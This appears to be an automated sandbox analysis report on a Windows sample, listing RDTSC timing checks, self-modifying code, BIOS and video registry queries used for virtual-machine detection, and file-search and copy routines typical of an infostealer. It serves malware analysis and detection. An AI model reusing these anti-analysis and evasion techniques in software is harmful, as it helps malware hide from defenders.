              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BCF5 second address: C3BD2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D38Ch 0x00000007 jmp 00007F893453D392h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F893453D394h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BD2F second address: C3BD3B instructions: 0x00000000 rdtsc 0x00000002 je 00007F8934532D06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BD3B second address: C3BD42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BE60 second address: C3BE73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8934532D06h 0x00000009 jo 00007F8934532D06h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C458F7 second address: C45903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 js 00007F893453D386h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C45903 second address: C45907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C45B67 second address: C45BA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F893453D399h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jnp 00007F893453D392h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F893453D38Ah 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C518D9 second address: C518DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C513FD second address: C5140A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 js 00007F893453D38Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5140A second address: C5140E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5140E second address: C51418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F893453D386h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C51418 second address: C51462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D0Bh 0x00000007 jmp 00007F8934532D17h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F8934532D0Dh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8934532D13h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C51462 second address: C51467 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C590AC second address: C590B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C590B6 second address: C590BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C590BB second address: C590C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8934532D06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C657CF second address: C657DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F893453D386h 0x0000000a pop esi 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C93D second address: C6C951 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8934532D08h 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F8934532D06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C951 second address: C6C955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CAAF second address: C6CAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CAB3 second address: C6CAB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CAB9 second address: C6CABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CABF second address: C6CAD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D38Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F893453D386h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CD60 second address: C6CD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7048F second address: C704A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F893453D386h 0x0000000a popad 0x0000000b jl 00007F893453D392h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C704A2 second address: C704A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C704A8 second address: C704AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C705E3 second address: C705FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C705FC second address: C70635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D391h 0x00000009 jns 00007F893453D386h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F893453D399h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70635 second address: C70639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70639 second address: C7063D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7063D second address: C70654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007F8934532D06h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9186D second address: B9189A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F893453D38Fh 0x0000000b pushad 0x0000000c jmp 00007F893453D391h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9189A second address: B918B5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F8934532D0Eh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jo 00007F8934532D06h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79F36 second address: C79F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79F3A second address: C79F44 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79F44 second address: C79F49 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F739 second address: C7F75A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8934532D06h 0x00000009 jmp 00007F8934532D16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DE16 second address: C7DE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8D092 second address: C8D096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5346 second address: CA537E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D393h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F893453D3A1h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5A4D second address: CA5A53 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5A53 second address: CA5A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F893453D398h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5F32 second address: CA5F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8934532D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5F3C second address: CA5F46 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F893453D386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5F46 second address: CA5F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5F4C second address: CA5F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F893453D390h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5F66 second address: CA5F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5F6C second address: CA5F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA60A8 second address: CA60AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA60AE second address: CA60B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA79A4 second address: CA79AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA79AD second address: CA79B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA79B3 second address: CA79BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA79BD second address: CA79DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D398h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA3A1 second address: CAA3A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA3A7 second address: CAA3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA3AB second address: CAA3AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA704 second address: CAA719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F893453D38Dh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA914 second address: CAA94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8934532D15h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F8934532D18h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA94E second address: CAA955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC0DC second address: CAC0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8934532D13h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC0F3 second address: CAC0F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC0F9 second address: CAC0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC0FF second address: CAC10C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F893453D388h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533022F second address: 5330233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330233 second address: 5330298 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F893453D38Bh 0x00000008 sub ax, B46Eh 0x0000000d jmp 00007F893453D399h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F893453D390h 0x0000001b and si, DFE8h 0x00000020 jmp 00007F893453D38Bh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b call 00007F893453D38Bh 0x00000030 pop esi 0x00000031 mov eax, ebx 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330298 second address: 5330323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8934532D10h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F8934532D0Bh 0x0000000f add cx, 2C8Eh 0x00000014 jmp 00007F8934532D19h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F8934532D0Ah 0x00000027 sub cx, A708h 0x0000002c jmp 00007F8934532D0Bh 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007F8934532D18h 0x00000038 and cl, 00000068h 0x0000003b jmp 00007F8934532D0Bh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330323 second address: 5330329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330329 second address: 533032D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533032D second address: 5330351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F893453D38Bh 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330351 second address: 5330360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8934532D0Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330360 second address: 5330364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330364 second address: 5330375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx edx, si 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330375 second address: 53303B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, eax 0x00000006 popad 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop ecx 0x0000000e pushfd 0x0000000f jmp 00007F893453D393h 0x00000014 or ax, 801Eh 0x00000019 jmp 00007F893453D399h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53303B7 second address: 53303BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533040B second address: 5330463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F893453D393h 0x00000013 adc eax, 46F8359Eh 0x00000019 jmp 00007F893453D399h 0x0000001e popfd 0x0000001f push eax 0x00000020 pop edi 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330463 second address: 5330469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A1FA67 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A1FB36 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A1D3E2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BD1DCE instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A1FA25 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-26816
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-26889
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007E18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007EE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007E4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ECBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007ECBE0
